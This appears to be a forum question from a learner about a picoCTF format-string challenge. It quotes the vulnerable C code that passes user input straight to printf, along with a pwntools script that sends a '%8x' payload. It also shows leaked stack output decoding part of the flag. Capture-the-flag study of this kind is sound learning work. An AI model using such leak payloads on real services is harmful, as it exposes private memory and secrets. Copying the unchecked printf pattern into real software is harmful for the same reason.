9Mar
String format exploit works differentely on my machine than on remote target
I'm learning binary exploitation with the picoCTF challenges. I solved Stonks, but I'm trying to learn more about how the stack works.
What I did was the following:
- checked out the source, here is the vulnerable snippet
int buy_stonks(Portfolio *p) {
char api_buf[FLAG_BUFFER];
FILE *f = fopen("api", "r");
fgets(api_buf, FLAG_BUFFER, f);
// TODO: Figure out how to read token from file, for now just ask
char *user_buf = malloc(300 + 1);
scanf("%300s", user_buf);
printf(user_buf);
}
- created the
api
fileecho picoCTF{s@mpl3_k3y} > api
- created exploit
#!/usr/bin/env python3
from pwn import *
os.system("make vuln")
io = process("./vuln")
# io = remote("mercury.picoctf.net", 59616)
payload = b"".join([b"" + "%8x".encode() * 14])
print(payload.decode("utf-8"))
io.sendline(payload)
out = io.recvline().decode()
for i in range(0, len(out[:-1]), 8):
h = out[i:i+8]
print(f"{h}: {p32(int(h, 16))}")
If I run it on my machine the output is:
%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x
1: b'\x01\x00\x00\x00'
1: b'\x01\x00\x00\x00'
f7d14887: b'\x87H\xd1\xf7'
19: b'\x19\x00\x00\x00'
5555b540: b'@\xb5UU'
ffffd790: b'\x90\xd7\xff\xff'
555592a0: b'\xa0\x92UU'
0: b'\x00\x00\x00\x00'
5555a2d0: b'\xd0\xa2UU'
5555b520: b' \xb5UU'
5555b540: b'@\xb5UU'
6f636970: b'pico'
706d4073: b's@mp'
a7d7933: b'3y}\n'
Last 3 line output the partial flag pico....s@mp....3y}\n
The same exploit (just commented out io = remote("mercury.picoctf.net", 59616)
prints the flag from the target:
...
6f636970: b'pico'
7b465443: b'CTF{'
...
ffcf007d: b'}\x00\xcf\xff'
I tried searching for maybe a linux security flag that could be enabled on my machine but I'm still new, but eager to learn!